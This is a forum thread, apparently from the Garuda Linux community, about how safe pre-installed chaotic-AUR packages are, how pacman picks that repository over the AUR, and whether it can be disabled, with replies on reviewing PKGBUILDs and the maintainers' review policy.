I have a very noob question, sorry in advance, I looked around but didn’t find any answer.
As I was requesting a package to be added to chaotic-AUR, we had a discussion on this very forum about package security, saying that even if there’s additional review, everything that is in chaotic-AUR is still pulled from AUR and users should review the PKGBUILD and be cautious.
That being said, after a clean install, I can see that some packages are pre-installed on Garuda from chaotic-AUR (see pic attached).
I tried to check a bit around, and software like Octopi, for example, is pulled from AUR and sourced from a dev called Alexandre Arnt’s repo.
So here are my questions:
I’m quite sure you’ve checked and double-checked what’s pre-installed from AUR, but why aren’t those packages directly in the garuda repository?
If I try to install something with pacman using CLI, and the software is in chaotic-AUR repo, it’s gonna be installed directly (as opposed to voluntarily use yay, for example, to build from AUR). How can I be sure I’m not installing from chaotic-AUR without reviewing the package (except by using Octopi)?
Can chaotic-AUR repo be deactivated without breaking Garuda’s packages, as apparently some core packages are pre-installed from there?
Thanks a lot for your time, and please forgive my noob questions!
My understanding of the Chaotic-AUR repo is that these are pre-compiled binaries of packages that are found in the AUR - Arch User Repository. To quote the ArchWiKi:
“The Arch User Repository (AUR) is a community-driven repository for Arch Linux users. It contains package descriptions (PKGBUILDs) that allow you to compile a package from source with makepkg and then install it via pacman. The AUR was created to organize and share new packages from the community and to help expedite popular packages’ inclusion into the extra repository. This document explains how users can access and utilize the AUR.”
As such, Chaotic-AUR is just a “nice” for those who don’t wish to compile the binaries themselves and/or have hardware that’s inefficient at compilation and don’t wish to wait, and/or don’t want to wait for Rust or other large applications to compile a package as that can take FOREVER in some cases (lookin’ at you GCC14).
pacman does not work with the AUR repo directly, which is often why we suggest using paru (garuda default) or yay - as these are AUR wrappers that will manage the installation and upgrade of packages that are only in the AUR repo, as pacman -Syu does not include AUR installed packages. I think the general preference for Garuda as a distro is to always use garuda-update either in shell or via Rani which leverages paru and will update your AUR installed packages. Since Chaotic-AUR is a repo with precompiled binaries, and it’s been added as a repo in your pacman.conf by default, pacman will can install packages from that repo, since it does not “recognize” the aur repo alone, so if the same package exists in aur and chaotic-aur, then pacman will only “see” the chaotic-aur package. However, if you use paru or yay it will ask you to pick which repo you wish to use. If you select the aur version, then it usually prompts you to review the PKGBUILD before you approve the installation. While a cursory review of the PKGBUILD is usually sufficient, often there are post installation scripts which can contain malicious code/malware that is not reviewed in the PKGBUILD and so further scrutiny may be necessary to manually review the post-installation script to ensure everything is above board.
I don’t think you can, no. I think there are some base garuda packages that are in chaotic-aur and disabling this will severely curtail or damage your system.
As for some of your other questions, I’ll leave others who may be more knowledgeable to address them.
Note it you use garuda-update from the cli you will need to add -a. So garuda-update -a
As for chaotic and safety and you want to see the pkg build cause the name of the pkg seems off just look it up here https://aur.archlinux.org/ . You can go one step further then the pkg build and check its Upstream URL most are github/gitlab. If you not into looking at the code check the issue tracker if it looks activeish you can kinda guess most things are alright or it would be called out.
I’ve been using chaotic since 2023 and never had a issue as of yet but i dont really grab weird pkgs.
Because we would effectively build them twice on our servers. That’s simply wasted processing power. Historically there was no Garuda repository and all of it was in Chaotic-AUR.
Regarding security I would argue that the situation has changed a little as we now do indeed review updates if it’s a) untrusted maintainer and b) anything bigger than a simple version change.
